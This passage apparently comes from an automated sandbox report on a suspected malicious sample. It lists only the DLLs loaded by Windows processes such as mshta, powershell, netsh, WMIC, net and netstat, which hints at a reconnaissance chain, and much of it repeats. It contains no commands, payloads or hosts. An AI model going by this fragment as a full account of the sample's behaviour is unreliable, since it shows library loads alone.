            Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: mswsock.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: napinsp.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: pnrpnsp.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: wshbth.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: nlaapi.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: dnsapi.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: winrnr.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\query.exeSection loaded: regapi.dll
            Source: C:\Windows\System32\quser.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\quser.exeSection loaded: utildll.dll
            Source: C:\Windows\System32\quser.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\quser.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\ipconfig.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\ROUTE.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\ROUTE.EXESection loaded: dnsapi.dll
            Source: C:\Windows\System32\ARP.EXESection loaded: snmpapi.dll
            Source: C:\Windows\System32\ARP.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\System32\ARP.EXESection loaded: inetmib1.dll
            Source: C:\Windows\System32\ARP.EXESection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\ARP.EXESection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\ARP.EXESection loaded: dnsapi.dll
            Source: C:\Windows\System32\NETSTAT.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\System32\NETSTAT.EXESection loaded: snmpapi.dll
            Source: C:\Windows\System32\NETSTAT.EXESection loaded: inetmib1.dll
            Source: C:\Windows\System32\NETSTAT.EXESection loaded: mswsock.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
